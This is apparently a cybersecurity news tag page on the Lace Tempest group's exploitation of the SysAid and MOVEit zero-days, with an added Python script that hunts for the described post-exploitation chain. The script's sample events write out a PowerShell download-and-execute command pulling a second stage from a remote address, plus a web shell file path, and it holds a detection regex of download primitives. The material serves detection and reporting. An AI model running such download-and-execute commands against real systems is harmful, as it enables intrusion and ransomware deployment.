Lace Tempest

All articles tagged with #lace tempest

cybersecurity, 2 years ago

SysAid Zero-Day Exploits: A Growing Threat in Ransomware Attacks

The threat actor Lace Tempest has been exploiting a zero-day vulnerability in the SysAid IT support software to distribute the Cl0p ransomware. The vulnerability, tracked as CVE-2023-47246, is a path traversal flaw that leads to code execution in on-premises installations; SysAid has patched it. After exploiting the flaw, Lace Tempest deploys a malware loader for the Gracewire malware, followed by human-operated activity such as lateral movement, data theft, and ransomware deployment. The intrusion involves uploading a web shell and other payloads into the webroot of SysAid's Tomcat web service, then using the MeshCentral Agent and PowerShell to download and run Cobalt Strike. Organizations running SysAid on-premises are advised to apply the patch promptly and scan their servers for signs of exploitation. The FBI has separately warned that ransomware attackers are targeting third-party vendors and abusing legitimate system tools to compromise businesses.

cybersecurity, 2 years ago

Hacker Group Exploits Zero-Day Bug to Target ITSM Platform

A critical zero-day vulnerability (CVE-2023-47246) in the SysAid IT support and management software is being exploited by the ransomware affiliate Lace Tempest, known for deploying Cl0p ransomware. This is not the first time Lace Tempest has exploited zero-day vulnerabilities: the group previously targeted Progress Software's MOVEit Transfer, Accellion's legacy File Transfer Appliance (FTA), and Fortra's GoAnywhere file transfer solution. The vulnerability allows unauthorized access to affected systems and execution of arbitrary code. SysAid has released a patch (v23.3.36) and advised customers to update their installations and check for evidence of compromise.

cybersecurity, 2 years ago

SysAid Zero-Day Flaw Exploited in Ransomware Attacks: Microsoft and SysAid Issue Urgent Patch Warning

Threat actors are exploiting a zero-day vulnerability in the SysAid service management software to gain access to corporate servers, steal data, and deploy Clop ransomware. The vulnerability, identified as CVE-2023-47246, was discovered by Microsoft Threat Intelligence, which attributes the exploitation to the threat actor it tracks as Lace Tempest. SysAid has released a patch and published indicators of compromise to help customers detect or prevent the intrusion. SysAid users are strongly recommended to update to version 23.3.36 or later and to check their servers thoroughly for signs of compromise.
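The compromise check that the SysAid summaries above call for, as an added example that is not SysAid's, Microsoft's or the articles' own tooling: it encodes the chain described in the first summary (SysAid's Tomcat web service spawning a command shell, a PowerShell download cradle, execution of the MeshCentral agent) as three rules over process-creation events, and diffs the Tomcat webroot listing against a known-clean baseline to surface newly dropped server-side files such as a web shell. The install path, process names, file names and sample events are constructed assumptions for illustration, not indicators published by SysAid.

```python
"""Hunt for the post-exploitation chain described in the SysAid summaries.

Added example, not vendor tooling. Event shape mirrors Sysmon Event ID 1
(parent image, image, command line); all paths, names and events below are
constructed and the SysAid install layout is an assumption.
"""
import re
from dataclasses import dataclass
from pathlib import PureWindowsPath

# Constructed process-creation events; the SysAidServer path is assumed.
SAMPLE_EVENTS = [
    # Normal service start of the Tomcat web service
    {"parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files\SysAidServer\tomcat\bin\tomcat9.exe",
     "cmdline": r'"C:\Program Files\SysAidServer\tomcat\bin\tomcat9.exe" //RS//SysAidServer'},
    # A web shell inside the Tomcat web service running a command via cmd.exe
    {"parent": r"C:\Program Files\SysAidServer\tomcat\bin\tomcat9.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c whoami"},
    # PowerShell download cradle pulling a second stage (TEST-NET-3 address)
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -nop -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage2')"},
    # MeshCentral agent launched from a user-writable directory
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\MeshAgent.exe",
     "cmdline": r"C:\Users\Public\MeshAgent.exe -fullinstall"},
    # Benign administrative PowerShell, must not be flagged
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Get-Service"},
]

# Constructed webroot listings: baseline from a clean install, current from the host.
BASELINE_WEBROOT = [r"C:\Program Files\SysAidServer\root\index.jsp",
                    r"C:\Program Files\SysAidServer\root\Login.jsp"]
CURRENT_WEBROOT = BASELINE_WEBROOT + [r"C:\Program Files\SysAidServer\root\cmd.jsp",
                                      r"C:\Program Files\SysAidServer\root\logo.png"]

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Common PowerShell download-and-execute primitives and encoded-command flags.
DOWNLOAD_CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression"
    r"|net\.webclient|-encodedcommand|\s-e(nc)?\s|start-bitstransfer",
    re.IGNORECASE,
)
# Extensions Tomcat executes as server-side code; a dropped web shell lands as one of these.
WEBSHELL_EXTS = {".jsp", ".jspx", ".war"}


def basename(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def is_sysaid_web_service(image: str) -> bool:
    """Assumption: SysAid's web service is a Tomcat (or java.exe) process under
    the SysAid install directory. Tune to the local install."""
    p = image.lower()
    return "sysaid" in p and ("tomcat" in basename(p) or basename(p) == "java.exe")


@dataclass
class Finding:
    rule: str
    image: str
    cmdline: str


def hunt(events):
    """Apply the three chain rules and return the findings in event order."""
    findings = []
    for ev in events:
        child = basename(ev["image"])
        if is_sysaid_web_service(ev["parent"]) and child in SHELLS:
            findings.append(Finding("sysaid_tomcat_spawned_shell", ev["image"], ev["cmdline"]))
        if child in POWERSHELL and DOWNLOAD_CRADLE.search(ev["cmdline"]):
            findings.append(Finding("powershell_download_cradle", ev["image"], ev["cmdline"]))
        if child.startswith("meshagent"):
            findings.append(Finding("meshcentral_agent_execution", ev["image"], ev["cmdline"]))
    return findings


def unexpected_webroot_files(listing, baseline):
    """Return server-side files present in the webroot but absent from the clean baseline."""
    known = {p.lower() for p in baseline}
    return sorted(p for p in listing
                  if p.lower() not in known and PureWindowsPath(p).suffix.lower() in WEBSHELL_EXTS)


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] {f.image}: {f.cmdline}")
    for path in unexpected_webroot_files(CURRENT_WEBROOT, BASELINE_WEBROOT):
        print(f"[unexpected_webroot_file] {path}")
```

Feed `hunt` the exported process-creation events from the SysAid host (and its domain neighbours, since the chain continues with lateral movement) and `unexpected_webroot_files` a recursive listing of the Tomcat webroot; the baseline should come from a fresh install of the same SysAid version rather than from the suspect host. Any `sysaid_tomcat_spawned_shell` hit is high-signal on its own, because the web service has no legitimate reason to launch a command shell.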

cybersecurity, 2 years ago

MOVEit Exploit Used by Ransomware Gang for Data Theft, Microsoft and CISA Warn

Microsoft has linked the Clop ransomware gang to recent data theft attacks that exploited a zero-day vulnerability in the MOVEit Transfer platform. The attacks began on May 27th, with the threat actors dropping web shells on servers to steal data and credentials. Microsoft attributes the attacks to Lace Tempest (formerly tracked as DEV-0950), whose activity overlaps with the groups known as TA505 and FIN11. The Clop ransomware operation is known for targeting managed file transfer software and is expected to begin extorting victims soon.

cybersecurity, 2 years ago

MOVEit Transfer App Exploited by Hackers for Data Theft and Ransomware Attacks, Microsoft and CISA Warn

Microsoft has linked the ongoing exploitation of a critical flaw in the Progress Software MOVEit Transfer application to the Lace Tempest threat actor. The group is known for exploiting zero-day flaws to siphon data and extort victims. The flaw, CVE-2023-34362, is an SQL injection vulnerability that lets attackers access the MOVEit database, authenticate as any user, and execute arbitrary code. At least 3,000 internet-exposed hosts are believed to be running the MOVEit Transfer service. Users are recommended to apply the vendor-provided patches as soon as possible.